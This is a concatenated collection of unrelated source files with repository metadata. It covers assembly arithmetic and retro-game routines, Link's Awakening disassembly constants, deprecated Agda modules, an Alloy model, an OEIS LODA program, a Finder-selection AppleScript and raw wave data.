%r9,%r10 mov $2,%r9 sub %rdx,%r9 lea -16(%rdi,%rdx,8),%rdi lea -16(%rsi,%rdx,8),%rsi push %r12 push %r13 push %r14 mov %rcx,%rdx C // rdx is 3 bit inverse mov $64,%rax sub %r8,%rax MOVQ %r8,%mm0 MOVQ %rax,%mm1 mov %rdx,%rax imul %ecx,%edx mov $2,%r11 sub %rdx,%r11 imul %eax,%r11d C //r11 has 4 bits mov %r11,%rax imul %ecx,%r11d mov $2,%rdx sub %r11,%rdx imul %eax,%edx C //rdx has 8 bits mov %rdx,%rax imul %ecx,%edx mov $2,%r11 sub %rdx,%r11 imul %eax,%r11d C //r11 has 16 bits mov %r11,%rax imul %ecx,%r11d mov $2,%rdx sub %r11,%rdx imul %eax,%edx C // rdx has 32 bits mov %rdx,%rax imul %rcx,%rdx mov $2,%r11 sub %rdx,%r11 imul %rax,%r11 C //r11 has 64 bits mov %r11,%rax mov %r11,%r12 mul %rcx neg %rdx imul %rdx,%r12 C // r12,r11 has 128 bits C // for the first limb we can not store (as we have to shift) so we need to C // do first limb separately , we could do it as normal as an extention of C // the loop , but if we do it as a 1 limb inverse then we can start it C // eailer , ie interleave it with the calculation of the 2limb inverse mov %r11,%r13 mov %r12,%r14 mov (%rsi,%r9,8),%r11 sub %r10,%r11 sbb %r10,%r10 imul %r13,%r11 MOVQ %r11,%mm2 psrlq %mm0,%mm2 mov %rcx,%rax mul %r11 mov 8(%rsi,%r9,8),%r11 mov 16(%rsi,%r9,8),%r12 add %r10,%r10 sbb %rdx,%r11 sbb $0,%r12 sbb %r10,%r10 add $2,%r9 jc L(skiplp) ALIGN(16) L(lp): mov %r12,%r8 mov %r13,%rax mul %r11 MOVQ %rax,%mm3 movq %mm3,%mm4 psllq %mm1,%mm3 psrlq %mm0,%mm4 por %mm3,%mm2 movq %mm2,-16(%rdi,%r9,8) imul %r14,%r11 imul %r13,%r12 add %r11,%rdx add %r12,%rdx mov 8(%rsi,%r9,8),%r11 mov 16(%rsi,%r9,8),%r12 MOVQ %rdx,%mm3 movq %mm3,%mm2 psllq %mm1,%mm3 psrlq %mm0,%mm2 por %mm3,%mm4 movq %mm4,-8(%rdi,%r9,8) mov %rcx,%rax mul %rdx add %r10,%r10 sbb $0,%r11 sbb $0,%r12 sbb %r10,%r10 cmp %rax,%r8 sbb %rdx,%r11 sbb $0,%r12 sbb $0,%r10 add $2,%r9 jnc L(lp) L(skiplp): mov %r12,%r8 mov %r13,%rax mul %r11 MOVQ %rax,%mm3 movq %mm3,%mm4 psllq %mm1,%mm3 psrlq %mm0,%mm4 por %mm3,%mm2 movq %mm2,-16(%rdi,%r9,8) imul %r14,%r11 imul %r13,%r12 add %r11,%rdx add %r12,%rdx cmp $0,%r9 jne L(case0) L(case1): mov 8(%rsi,%r9,8),%r11 MOVQ %rdx,%mm3 movq %mm3,%mm2 psllq %mm1,%mm3 psrlq %mm0,%mm2 por %mm3,%mm4 movq %mm4,-8(%rdi,%r9,8) mov %rcx,%rax mul %rdx add %r10,%r10 sbb $0,%r11 sbb %r10,%r10 cmp %rax,%r8 sbb %rdx,%r11 sbb $0,%r10 mov %r11,%rax imul %r13,%rax MOVQ %rax,%mm3 movq %mm3,%mm4 psllq %mm1,%mm3 psrlq %mm0,%mm4 por %mm3,%mm2 movq %mm2,(%rdi,%r9,8) movq %mm4,8(%rdi,%r9,8) mul %rcx add %r10,%r10 mov $0,%rax adc %rdx,%rax pop %r14 pop %r13 pop %r12 emms ret L(case0): MOVQ %rdx,%mm3 movq %mm3,%mm2 psllq %mm1,%mm3 psrlq %mm0,%mm2 por %mm3,%mm4 movq %mm4,-8(%rdi,%r9,8) movq %mm2,(%rdi,%r9,8) mov %rcx,%rax mul %rdx cmp %rax,%r8 mov $0,%rax adc %rdx,%rax sub %r10,%rax pop %r14 pop %r13 pop %r12 emms ret EPILOGUE()

agda-stdlib/src/Data/Product/N-ary/Categorical.agda

DreamLinuxer/popl21-artifact

5

5131

------------------------------------------------------------------------ -- The Agda standard library -- -- This module is DEPRECATED. Please use Data.Vec.Recursive.Categorical -- instead. ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} module Data.Product.N-ary.Categorical where {-# WARNING_ON_IMPORT "Data.Product.N-ary.Categorical was deprecated in v1.1. Use Data.Vec.Recursive.Categorical instead." #-} open import Data.Vec.Recursive.Categorical public

Chapter 09/ifelse/ifelse/ifelse-Optimized.asm

bpbpublications/Implementing-Reverse-Engineering

0

100917

; Listing generated by Microsoft (R) Optimizing Compiler Version 16.00.30319.01 TITLE C:\JitenderN\REBook\ifelse\ifelse\ifelse.cpp .686P .XMM include listing.inc .model flat INCLUDELIB LIBCMT INCLUDELIB OLDNAMES CONST SEGMENT $SG4679 DB 'Input Number1 : ', 00H ORG $+3 $SG4680 DB '%d', 00H ORG $+1 $SG4681 DB 'Input Number2 : ', 00H ORG $+3 $SG4682 DB '%d', 00H ORG $+1 $SG4684 DB 'Number1 and Number2 are equal', 0aH, 00H ORG $+1 $SG4686 DB 'Number1 and Number2 are not equal', 0aH, 00H CONST ENDS PUBLIC _main EXTRN _scanf:PROC EXTRN _printf:PROC ; Function compile flags: /Ogtpy _TEXT SEGMENT _iNumber1$ = -8 ; size = 4 _iNumber2$ = -4 ; size = 4 _main PROC ; File c:\jitendern\rebook\ifelse\ifelse\ifelse.cpp ; Line 7 sub esp, 8 ; Line 10 push OFFSET $SG4679 call _printf ; Line 11 lea eax, DWORD PTR _iNumber1$[esp+12] push eax push OFFSET $SG4680 call _scanf ; Line 12 push OFFSET $SG4681 call _printf ; Line 13 lea ecx, DWORD PTR _iNumber2$[esp+24] push ecx push OFFSET $SG4682 call _scanf ; Line 14 mov edx, DWORD PTR _iNumber1$[esp+32] add esp, 24 ; 00000018H cmp edx, DWORD PTR _iNumber2$[esp+8] jne SHORT $LN2@main ; Line 15 push OFFSET $SG4684 ; Line 17 call _printf add esp, 4 ; Line 18 xor eax, eax add esp, 8 ret 0 $LN2@main: ; Line 17 push OFFSET $SG4686 call _printf add esp, 4 ; Line 18 xor eax, eax add esp, 8 ret 0 _main ENDP _TEXT ENDS END

projects/Links_Awakening_gb.windfish/configuration/datatypes.asm

jverkoey/awaken

68

161701

<filename>projects/Links_Awakening_gb.windfish/configuration/datatypes.asm ; ANIMATED_TILE [Enumerated] [Hex] ANIMATED_TILE_NONE EQU $00 ANIMATED_TILE_COUNTER EQU $01 ANIMATED_TILE_TIDE EQU $02 ANIMATED_TILE_VILLAGE EQU $03 ANIMATED_TILE_DUNGEON_1 EQU $04 ANIMATED_TILE_UNDERGROUND EQU $05 ANIMATED_TILE_LAVA EQU $06 ANIMATED_TILE_DUNGEON_2 EQU $07 ANIMATED_TILE_WARP_TILE EQU $08 ANIMATED_TILE_CURRENTS EQU $09 ANIMATED_TILE_WATERFALL EQU $0A ANIMATED_TILE_WATERFALL_SLOW EQU $0B ANIMATED_TILE_WATER_DUNGEON EQU $0C ANIMATED_TILE_LIGHT_BEAM EQU $0D ANIMATED_TILE_CRYSTAL_BLOCK EQU $0E ANIMATED_TILE_BUBBLES EQU $0F ANIMATED_TILE_WEATHER_VANE EQU $10 ANIMATED_TILE_PHOTO EQU $11 ; BUTTON [Bitmask] [Binary] J_RIGHT EQU %00000001 J_LEFT EQU %00000010 J_UP EQU %00000100 J_DOWN EQU %00001000 J_A EQU %00010000 J_B EQU %00100000 J_SELECT EQU %01000000 J_START EQU %10000000 ; DIRECTION [Enumerated] [Hex] DIRECTION_RIGHT EQU $00 DIRECTION_LEFT EQU $01 DIRECTION_UP EQU $02 DIRECTION_DOWN EQU $03 DIRECTION_KEEP EQU $0F ; GAMEMODE [Enumerated] [Hex] GAMEMODE_INTRO EQU $00 GAMEMODE_CREDITS EQU $01 GAMEMODE_FILE_SELECT EQU $02 GAMEMODE_FILE_NEW EQU $03 GAMEMODE_FILE_DELETE EQU $04 GAMEMODE_FILE_COPY EQU $05 GAMEMODE_FILE_SAVE EQU $06 GAMEMODE_WORLD_MAP EQU $07 GAMEMODE_PEACH_PIC EQU $08 GAMEMODE_MARIN_BEACH EQU $09 GAMEMODE_WF_MURAL EQU $0A GAMEMODE_WORLD EQU $0B GAMEMODE_INVENTORY EQU $0C GAMEMODE_PHOTO_ALBUM EQU $0D GAMEMODE_PHOTO_DIZZY_LINK EQU $0E GAMEMODE_PHOTO_NICE_LINK EQU $0F GAMEMODE_PHOTO_MARIN_CLIFF EQU $10 GAMEMODE_PHOTO_MARIN_WELL EQU $11 GAMEMODE_PHOTO_MABE EQU $12 GAMEMODE_PHOTO_ULRIRA EQU $13 GAMEMODE_PHOTO_BOW_WOW EQU $14 GAMEMODE_PHOTO_THIEF EQU $15 GAMEMODE_PHOTO_FISHERMAN EQU $16 GAMEMODE_PHOTO_ZORA EQU $17 GAMEMODE_PHOTO_KANALET EQU $18 GAMEMODE_PHOTO_GHOST EQU $19 GAMEMODE_PHOTO_BRIDGE EQU $1A ; HW_AUDIO_ENABLE [Bitmask] [Binary] HW_AUDIO_ENABLE EQU %10000000 ; HW_CARTRIDGETYPE [Enumerated] [Hex] cartridge_mbc1_ram_battery EQU $03 ; HW_COLORGAMEBOY [Enumerated] [Hex] not_color_gameboy EQU $00 is_color_gameboy EQU $80 ; HW_DESTINATIONCODE [Enumerated] [Hex] destination_japanese EQU $00 destination_nonjapanese EQU $01 ; HW_IE [Bitmask] [Binary] IE_VBLANK EQU %00000001 IE_LCDC EQU %00000010 IE_TIMEROVERFLOW EQU %00000100 IE_SERIALIO EQU %00001000 IE_PIN1013TRANSITION EQU %00010000 ; HW_RAMSIZE [Enumerated] [Hex] ramsize_none EQU $00 ramsize_1bank EQU $01 ramsize_1bank_ EQU $02 ramsize_4banks EQU $03 ramsize_16banks EQU $04 ; HW_ROMSIZE [Enumerated] [Hex] romsize_2banks EQU $00 romsize_4banks EQU $01 romsize_8banks EQU $02 romsize_16banks EQU $03 romsize_32banks EQU $04 romsize_64banks EQU $05 romsize_128banks EQU $06 romsize_72banks EQU $52 romsize_80banks EQU $53 romsize_96banks EQU $54 ; HW_SUPERGAMEBOY [Enumerated] [Hex] not_super_gameboy EQU $00 is_super_gameboy EQU $80 ; INTERACTIVE_MOTION [Enumerated] [Hex] INTERACTIVE_MOTION_ENABLED EQU $00 INTERACTIVE_MOTION_LOCKED_GRAB_SLASH EQU $01 INTERACTIVE_MOTION_LOCKED_TALKING EQU $02 ; JOYPAD [Bitmask] [Binary] JOYPAD_DIRECTIONS EQU %00010000 JOYPAD_BUTTONS EQU %00100000 ; LCDCF [Bitmask] [Binary] LCDCF_OFF EQU %00000000 LCDCF_ON EQU %10000000 LCDCF_TILEMAP_9C00 EQU %01000000 LCDCF_WINDOW_ON EQU %00100000 LCDCF_BG_CHAR_8000 EQU %00010000 LCDCF_BG_TILE_9C00 EQU %00001000 LCDCF_OBJ_16_16 EQU %00000100 LCDCF_OBJ_DISPLAY EQU %00000010 LCDCF_BG_DISPLAY EQU %00000001 ; LINK_ANIMATION [Enumerated] [Hex] LINK_ANIMATION_STATE_STANDING_DOWN EQU $00 LINK_ANIMATION_STATE_WALKING_DOWN EQU $01 LINK_ANIMATION_STATE_UNKNOWN_02 EQU $02 LINK_ANIMATION_STATE_UNKNOWN_03 EQU $03 LINK_ANIMATION_STATE_STANDING_UP EQU $04 LINK_ANIMATION_STATE_WALKING_UP EQU $05 LINK_ANIMATION_STATE_STANDING_LEFT EQU $06 LINK_ANIMATION_STATE_WALKING_LEFT EQU $07 LINK_ANIMATION_STATE_UNKNOWN_08 EQU $08 LINK_ANIMATION_STATE_UNKNOWN_09 EQU $09 LINK_ANIMATION_STATE_STANDING_RIGHT EQU $0A LINK_ANIMATION_STATE_WALKING_RIGHT EQU $0B LINK_ANIMATION_STATE_HOOKSHOT_CHAIN_DOWN EQU $0E LINK_ANIMATION_STATE_HOOKSHOT_CHAIN_UP EQU $0F LINK_ANIMATION_STATE_HOOKSHOT_CHAIN_LEFT EQU $10 LINK_ANIMATION_STATE_HOOKSHOT_CHAIN_RIGHT EQU $11 LINK_ANIMATION_STATE_UNKNOWN_12 EQU $12 LINK_ANIMATION_STATE_UNKNOWN_13 EQU $13 LINK_ANIMATION_STATE_UNKNOWN_14 EQU $14 LINK_ANIMATION_STATE_UNKNOWN_15 EQU $15 LINK_ANIMATION_STATE_UNKNOWN_16 EQU $16 LINK_ANIMATION_STATE_UNKNOWN_17 EQU $17 LINK_ANIMATION_STATE_UNKNOWN_18 EQU $18 LINK_ANIMATION_STATE_UNKNOWN_19 EQU $19 LINK_ANIMATION_STATE_STANDING_PUSHING_DOWN EQU $1A LINK_ANIMATION_STATE_WALKING_PUSHING_DOWN EQU $1B LINK_ANIMATION_STATE_STANDING_PUSHING_UP EQU $1C LINK_ANIMATION_STATE_WALKING_PUSHING_UP EQU $1D LINK_ANIMATION_STATE_STANDING_PUSHING_LEFT EQU $1E LINK_ANIMATION_STATE_WALKING_PUSHING_LEFT EQU $1F LINK_ANIMATION_STATE_STANDING_PUSHING_RIGHT EQU $20 LINK_ANIMATION_STATE_WALKING_PUSHING_RIGHT EQU $21 LINK_ANIMATION_STATE_STANDING_SHIELD_DOWN EQU $22 LINK_ANIMATION_STATE_WALKING_SHIELD_DOWN EQU $23 LINK_ANIMATION_STATE_STANDING_SHIELD_USE_DOWN EQU $24 LINK_ANIMATION_STATE_WALKING_SHIELD_USE_DOWN EQU $25 LINK_ANIMATION_STATE_STANDING_MIRROR_SHIELD_USE_DOWN EQU $26 LINK_ANIMATION_STATE_WALKING_MIRROR_SHIELD_USE_DOWN EQU $27 LINK_ANIMATION_STATE_STANDING_SHIELD_USE_LEFT EQU $28 LINK_ANIMATION_STATE_WALKING_SHIELD_USE_LEFT EQU $29 LINK_ANIMATION_STATE_STANDING_SHIELD_USE_RIGHT EQU $2A LINK_ANIMATION_STATE_WALKING_SHIELD_USE_RIGHT EQU $2B LINK_ANIMATION_STATE_STANDING_SHIELD_RIGHT EQU $2C LINK_ANIMATION_STATE_WALKING_SHIELD_RIGHT EQU $2D LINK_ANIMATION_STATE_STANDING_MIRROR_SHIELD_RIGHT EQU $2E LINK_ANIMATION_STATE_WALKING_MIRROR_SHIELD_RIGHT EQU $2F LINK_ANIMATION_STATE_STANDING_SHIELD_USE_UP EQU $30 LINK_ANIMATION_STATE_WALKING_SHIELD_USE_UP EQU $31 LINK_ANIMATION_STATE_STANDING_MIRROR_SHIELD_USE_UP EQU $32 LINK_ANIMATION_STATE_WALKING_MIRROR_SHIELD_USE_UP EQU $33 LINK_ANIMATION_STATE_STANDING_SHIELD_UP EQU $34 LINK_ANIMATION_STATE_WALKING_SHIELD_UP EQU $35 LINK_ANIMATION_STATE_UNKNOWN_36 EQU $36 LINK_ANIMATION_STATE_UNKNOWN_38 EQU $38 LINK_ANIMATION_STATE_UNKNOWN_3A EQU $3A LINK_ANIMATION_STATE_UNKNOWN_3C EQU $3C LINK_ANIMATION_STATE_STANDING_LIFTING_RIGHT EQU $3E LINK_ANIMATION_STATE_WALKING_LIFTING_RIGHT EQU $3F LINK_ANIMATION_STATE_STANDING_LIFTING_LEFT EQU $40 LINK_ANIMATION_STATE_WALKING_LIFTING_LEFT EQU $41 LINK_ANIMATION_STATE_STANDING_LIFTING_UP EQU $42 LINK_ANIMATION_STATE_WALKING_LIFTING_UP EQU $43 LINK_ANIMATION_STATE_STANDING_LIFTING_DOWN EQU $44 LINK_ANIMATION_STATE_WALKING_LIFTING_DOWN EQU $45 LINK_ANIMATION_STATE_HOLD_SWIMMING_1_RIGHT EQU $46 LINK_ANIMATION_STATE_MOVING_SWIMMING_1_RIGHT EQU $47 LINK_ANIMATION_STATE_HOLD_SWIMMING_1_LEFT EQU $48 LINK_ANIMATION_STATE_MOVING_SWIMMING_1_LEFT EQU $49 LINK_ANIMATION_STATE_HOLD_SWIMMING_1_UP EQU $4A LINK_ANIMATION_STATE_MOVING_SWIMMING_1_UP EQU $4B LINK_ANIMATION_STATE_HOLD_SWIMMING_1_DOWN EQU $4C LINK_ANIMATION_STATE_MOVING_SWIMMING_1_DOWN EQU $4D LINK_ANIMATION_STATE_HOLD_SWIMMING_2 EQU $4E LINK_ANIMATION_STATE_MOVING_SWIMMING_2 EQU $4F LINK_ANIMATION_STATE_UNKNOWN_50 EQU $50 LINK_ANIMATION_STATE_UNKNOWN_51 EQU $51 LINK_ANIMATION_STATE_UNKNOWN_52 EQU $52 LINK_ANIMATION_STATE_UNKNOWN_53 EQU $53 LINK_ANIMATION_STATE_UNKNOWN_54 EQU $54 LINK_ANIMATION_STATE_UNKNOWN_55 EQU $55 LINK_ANIMATION_STATE_UNKNOWN_56 EQU $56 LINK_ANIMATION_STATE_UNKNOWN_57 EQU $57 LINK_ANIMATION_STATE_STANDING_SIDE_SCROLL_LEFT_DOWN EQU $58 LINK_ANIMATION_STATE_WALKING_SIDE_SCROLL_LEFT_DOWN EQU $59 LINK_ANIMATION_STATE_STANDING_SIDE_SCROLL_RIGHT_UP EQU $5B LINK_ANIMATION_STATE_WALKING_SIDE_SCROLL_RIGHT_UP EQU $5C LINK_ANIMATION_STATE_JUMPING_1 EQU $5E LINK_ANIMATION_STATE_JUMPING_2 EQU $5F LINK_ANIMATION_STATE_JUMPING_3 EQU $60 LINK_ANIMATION_STATE_UNKNOWN_61 EQU $61 LINK_ANIMATION_STATE_UNKNOWN_62 EQU $62 LINK_ANIMATION_STATE_UNKNOWN_63 EQU $63 LINK_ANIMATION_STATE_UNKNOWN_64 EQU $64 LINK_ANIMATION_STATE_UNKNOWN_65 EQU $65 LINK_ANIMATION_STATE_UNKNOWN_66 EQU $66 LINK_ANIMATION_STATE_UNKNOWN_67 EQU $67 LINK_ANIMATION_STATE_UNKNOWN_68 EQU $68 LINK_ANIMATION_STATE_UNKNOWN_69 EQU $69 LINK_ANIMATION_STATE_UNKNOWN_6A EQU $6A LINK_ANIMATION_STATE_UNKNOWN_6B EQU $6B LINK_ANIMATION_STATE_GOT_ITEM EQU $6C LINK_ANIMATION_STATE_UNKNOWN_75 EQU $75 LINK_ANIMATION_STATE_NO_UPDATE EQU $FF ; MUSIC [Enumerated] [Hex] MUSIC_NONE EQU $00 MUSIC_TITLE_SCREEN_INTRO EQU $01 MUSIC_MINIGAME EQU $02 MUSIC_GAME_OVER EQU $03 MUSIC_MABE_VILLAGE EQU $04 MUSIC_OVERWORLD EQU $05 MUSIC_MT_TAMARANCH EQU $06 MUSIC_WITCH_HUT EQU $07 MUSIC_RAFT_RIDE_RAPIDS EQU $08 MUSIC_MYSTERIOUS_FOREST EQU $09 MUSIC_HOUSE EQU $0A MUSIC_ANIMAL_VILLAGE EQU $0B MUSIC_FAIRY_FOUNTAIN EQU $0C MUSIC_TITLE_SCREEN EQU $0D MUSIC_BOWWOW_KIDNAPPED EQU $0E MUSIC_SWORD_ACQUIRED EQU $0F MUSIC_TOOL_ACQUIRED EQU $10 MUSIC_FILE_SELECT EQU $11 MUSIC_EGG_MAZE EQU $12 MUSIC_KANALET_CASTLE EQU $13 MUSIC_TAIL_CAVE EQU $14 MUSIC_BOTTLE_GROTTO EQU $15 MUSIC_KEY_CAVERN EQU $16 MUSIC_ANGLERS_TUNNEL EQU $17 MUSIC_BOSS_DEFEATED EQU $18 MUSIC_BOSS_BATTLE EQU $19 MUSIC_INTRO_CUTSCENE EQU $1A MUSIC_INSTRUMENT_ACQUIRED EQU $1B MUSIC_LINK_AWAKENS EQU $1C MUSIC_SWORD_SEARCH EQU $1D MUSIC_DREAMING EQU $1E MUSIC_SOUTHERN_SHRINE EQU $1F MUSIC_INSTRUMENT_FULL_MOON_CELLO EQU $20 MUSIC_2D_UNDERGROUND EQU $21 MUSIC_OWL EQU $22 MUSIC_FINAL_BOSS EQU $23 MUSIC_DREAM_SHRINE_BED EQU $24 MUSIC_HEART_CONTAINER_ACQUIRED EQU $25 MUSIC_COMMON_CAVE EQU $26 MUSIC_POWERUP_ACQUIRED EQU $27 MUSIC_INSTRUMENT_CONCH_HORN EQU $28 MUSIC_INSTRUMENT_SEA_LILY_BELL EQU $29 MUSIC_INSTRUMENT_SURF_HARP EQU $2A MUSIC_INSTRUMENT_WIND_MARIMBA EQU $2B MUSIC_INSTRUMENT_CORAL_TRIANGLE EQU $2C MUSIC_INSTRUMENT_ORGAN_OF_EVENING_CALM EQU $2D MUSIC_INSTRUMENT_THUNDER_DRUM EQU $2E MUSIC_MARIN_SINGING EQU $2F MUSIC_MANBO_MAMBO EQU $30 MUSIC_OVERWORLD_INTRO EQU $31 MUSIC_MR_WRITE_HOUSE EQU $32 MUSIC_PHONE_BOOTH EQU $33 MUSIC_TARIN_BEEHIVE EQU $34 MUSIC_MAMU_SONG EQU $35 MUSIC_MONKEYS_BUILDING_BRIDGE EQU $36 MUSIC_CHRISTINE_HOUSE EQU $37 MUSIC_TOTAKA_SONG_UNUSED EQU $38 MUSIC_TURTLE_ROCK_ENTRANCE_BOSS EQU $39 MUSIC_FISHING_UNDER_BRIDGE EQU $3A MUSIC_CLASSIC_RECEIVED_ITEM EQU $3B MUSIC_TOTAKEKE_NICKNAME_EASTER_EGG EQU $3C MUSIC_ENDING EQU $3D MUSIC_BOWWOW_KIDNAPPED_INTRODUCTION EQU $3E MUSIC_WIND_FISH_AWAKENS EQU $3F MUSIC_RICHARD_MANSION EQU $40 MUSIC_BALLAD_HORN EQU $41 MUSIC_BALLAD_BELL EQU $42 MUSIC_BALLAD_HARP EQU $43 MUSIC_BALLAD_MARIMBA EQU $44 MUSIC_BALLAD_TRIANGLE EQU $45 MUSIC_BALLAD_ORGAN EQU $46 MUSIC_BALLAD_ALL EQU $47 MUSIC_GHOST_HOUSE EQU $48 MUSIC_ACTIVE_POWER_UP EQU $49 MUSIC_LINK_MARIN_DUET EQU $4A MUSIC_CATFISH_MAW EQU $4B MUSIC_WATERFALL_DRAIN EQU $4C MUSIC_MARIN_BEACH_TRANSITION EQU $4D MUSIC_MARIN_BEACH EQU $4E MUSIC_MINIBOSS EQU $50 MUSIC_KANALET_CASTLE_COPY EQU $51 MUSIC_TAIL_CAVE_COPY EQU $52 MUSIC_DREAM_SHRINE EQU $53 MUSIC_EAGLES_TOWER_BOSS_CUTSCENE EQU $54 MUSIC_ROOSTER_REVIVAL EQU $55 MUSIC_SEASHELL_MANSION_SPIRIT EQU $56 MUSIC_CUCCO_HOUSE EQU $57 MUSIC_FACE_SHRINE EQU $58 MUSIC_MEETING_WINDFISH EQU $59 MUSIC_TURTLE_ROCK EQU $5A MUSIC_EAGLE_TOWER EQU $5B MUSIC_GRIM_CREEPER_DIALOG EQU $5C MUSIC_FINAL_BOSS_DIALOG EQU $5D MUSIC_BOSS_WARNING EQU $5E MUSIC_FINAL_BOSS_DEFEATED EQU $5F MUSIC_ZELDA_NICKNAME_EASTER_EGG EQU $60 MUSIC_COLOR_DUNGEON EQU $61 MUSIC_SILENCE EQU $FF ; STATF [Bitmask] [Binary] STATF_LYC EQU %01000000 STATF_MODE10 EQU %00100000 STATF_MODE01 EQU %00010000 STATF_MODE00 EQU %00001000 STATF_LYCF EQU %00000100 STATF_OAM EQU %00000010 STATF_VB EQU %00000001 STATF_HB EQU %00000000 ; UPDATE_BG_TILES [Enumerated] [Hex] UPDATE_BG_TILES_DO_NOTHING EQU $00 UPDATE_BG_TILES_WORLD EQU $01 UPDATE_BG_TILES_DUNGEON_MINIMAP EQU $02 ; binary [Any] [Binary] ; bool [Enumerated] [Decimal] false EQU 0 true EQU 1 ; decimal [Any] [Decimal] ; hex [Any] [Hex]

alloy4fun_models/trashltl/models/7/BLDFMEhPyqfHPhNPp.als

Kaixi26/org.alloytools.alloy

0

3041

<reponame>Kaixi26/org.alloytools.alloy open main pred idBLDFMEhPyqfHPhNPp_prop8 { all f1,f2 : File | f1->f2 in link implies eventually f2 in Trash } pred __repair { idBLDFMEhPyqfHPhNPp_prop8 } check __repair { idBLDFMEhPyqfHPhNPp_prop8 <=> prop8o }

programs/oeis/069/A069722.asm

neoneye/loda

22

91094

; A069722: Number of rooted unicursal planar maps with n edges and exactly one vertex of valency 1 (unicursal means that exactly two vertices are of odd valency; there is an Eulerian path). ; 0,4,24,160,1120,8064,59136,439296,3294720,24893440,189190144,1444724736,11076222976,85201715200,657270374400,5082890895360,39392404439040,305870434467840,2378992268083200,18531097667174400,144542561803960320,1128808577897594880,8825230699926650880,69067022868991180800,541025012473764249600,4241636097794311716864,33280529382693830393856,261313786264114520129536,2053179749218042658160640,16142240786955645726228480,126985627524051079712997376,999499777931240756450689024,7871060751208520957049176064,62014418039824710570690478080,488819530431559483321913180160,3854691154260297639909943934976,30409230216942348048178446598144,239986357387761233245083956936704,1894629137271799209829610186342400,14962712161018311708397947112652800,118205426072044662496343782189957120,934111171886401723141838669013319680 mov $1,$0 mul $0,2 bin $0,$1 lpb $1 mul $0,2 sub $1,1 lpe div $0,4 mul $0,4

agda-stdlib/src/Data/List/Any/Properties.agda

DreamLinuxer/popl21-artifact

5

27

<gh_stars>1-10 ------------------------------------------------------------------------ -- The Agda standard library -- -- This module is DEPRECATED. Please use -- Data.List.Relation.Unary.Any.Properties directly. ------------------------------------------------------------------------ {-# OPTIONS --without-K --safe #-} module Data.List.Any.Properties where open import Data.List.Relation.Unary.Any.Properties public {-# WARNING_ON_IMPORT "Data.List.Any.Properties was deprecated in v1.0. Use Data.List.Relation.Unary.Any.Properties instead." #-}

Computer_Science/8_Assembly_Level_Programming/p01_helloworld.asm

Soumya14022002/Algos-for-all-Amigos

10

95686

; Comment Line ; Install an 8086 Assembler and run the code ; Resources used: https://www.youtube.com/watch?v=zEuvNYe7WG0 .model tiny .code org 100h ; Code starts with an offset of 100h main proc near mov ah, 09h ; Moving the value of 09h to the register ah mov dx, offset message ; Moving the message to be displayed to register dx. Must end with a $ sign int 21h ; DOS Interrupt. Initiates the process. Done before almost every command mov ah, 4ch ; Moves the value of 4ch to register ah. Function to terminate mov al, 00 int 21h ; Again, using the interrupt to intiate the above 2 lines endp ; Ends the main message db "Hello World! $" ; db data type. Variable name is message. String must be within "" and must end with $ end main ; Ends the program

src/main/fragment/mos6502-common/vwum1=vwum1_plus__word1_vdum2.asm

jbrandwood/kickc

2

245971

clc lda {m1} adc {m2}+2 sta {m1} lda {m1}+1 adc {m2}+3 sta {m1}+1

get_selection.applescript

Bilalh/Scripts

0

1714

<filename>get_selection.applescript #!/usr/bin/env osascript set res to "" tell application "Finder" set paths to the selection repeat with i from 1 to number of items in paths set res to res & " " & quoted form of POSIX path of (item i of paths as alias) end repeat end tell res

data/all_data_files_waves.asm

artrag/voicenc_scc

4

165872

<filename>data/all_data_files_waves.asm<gh_stars>1-10 CODE data1: db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 db 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0xE4,0xF3,0xF5,0xEA,0xE2,0xE8,0xF7,0x05,0x0C,0x0F,0x13,0x15,0x18,0x1A,0x1C,0x19,0x13,0x0B,0x03,0xFF,0x01,0x04,0x03,0x06,0x1D,0x30,0x1E,0xF0,0xD1,0xCD,0xD1,0xD7 db 0xD5,0xEA,0xF7,0xF4,0xEC,0xF0,0xFB,0x04,0x09,0x10,0x1B,0x22,0x25,0x26,0x25,0x21,0x17,0x0D,0x03,0xFE,0xFC,0xFD,0xFC,0x04,0x1B,0x2F,0x21,0xF5,0xD1,0xC5,0xC4,0xC8 db 0xC9,0xDF,0xEE,0xF6,0xFD,0x03,0x07,0x07,0x09,0x11,0x1C,0x25,0x2A,0x2B,0x29,0x21,0x16,0x0A,0x01,0xFC,0xFA,0xF9,0xFE,0x0F,0x22,0x23,0x0C,0xEE,0xD8,0xC7,0xBC,0xBA db 0xC5,0xDA,0xEB,0xF7,0x00,0x07,0x0B,0x0B,0x0D,0x13,0x1C,0x24,0x2A,0x2C,0x2A,0x24,0x19,0x0C,0x01,0xFA,0xF6,0xF5,0xFC,0x0C,0x1D,0x1E,0x0C,0xF4,0xDE,0xCB,0xBC,0xB9 db 0xC7,0xDA,0xEB,0xF5,0xFB,0x01,0x05,0x07,0x09,0x10,0x1A,0x21,0x26,0x28,0x27,0x21,0x17,0x0C,0x03,0xFC,0xFA,0xFA,0xF8,0x06,0x1A,0x22,0x14,0xFA,0xE2,0xD0,0xC2,0xBD db 